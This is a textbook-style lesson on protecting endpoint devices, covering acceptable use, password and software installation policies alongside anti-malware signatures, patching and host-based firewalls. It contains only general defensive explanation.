Skip to main content

4.3 Protecting Devices

Topic 4.3: Protecting Devices

Protecting individual devices, or endpoints, is a critical component of a comprehensive cybersecurity strategy. This is achieved through a combination of managerial policies that guide user behavior and technical controls that harden the devices themselves against attack.

Managerial controls for device security establish clear rules and expectations for users. These policies are crucial for maintaining a consistent security posture across an organization. Key policies include:

  • Acceptable Use Policy (AUP): This policy defines what activities are permissible on company-owned devices. It may prohibit users from visiting certain types of websites (like social media), installing unauthorized software, or connecting personal external drives.
  • Password Policy: This policy outlines the requirements for user passwords, such as minimum length, complexity rules (requiring a mix of character types), and rules against reusing old passwords. It reinforces the technical settings configured for authentication.
  • Software Installation Policy: To prevent the introduction of malware or vulnerable applications, this policy typically restricts users from installing any software on their own. Instead, it establishes a formal process for users to request and receive approved software from the IT department.

In addition to policies, several technical controls are essential for protecting devices. Anti-malware software, also known as antivirus software, is a fundamental tool. This software maintains a database of signatures, which are unique identifiers for known malware. It regularly scans the files on a device, and if it finds a file that matches a signature in its database, it will quarantine or remove the malicious file to prevent it from causing harm. It is vital that this software and its signature database are kept constantly updated to protect against the latest threats.

Keeping a device's operating system and all installed software updated is one of the most effective security measures. When developers discover vulnerabilities in their software, they release updates, or patches, to fix them. Applying these patches in a timely manner closes the security holes before adversaries can exploit them. Many attacks succeed by targeting known vulnerabilities on unpatched systems.

A host-based firewall provides another important layer of protection. Unlike a network firewall that protects an entire network, a host-based firewall runs on an individual device and controls the traffic entering and leaving that specific device. It operates using a set of rules (an ACL) to allow or deny traffic based on port, protocol, or application. A properly configured host-based firewall can prevent an unauthorized connection to a device, even if the device is on a compromised network. It can also block outbound traffic, which can prevent malware on the device from communicating with an adversary's command and control server. As a best practice, a host-based firewall should be configured to block all ports and services that are not explicitly needed for the device to perform its function.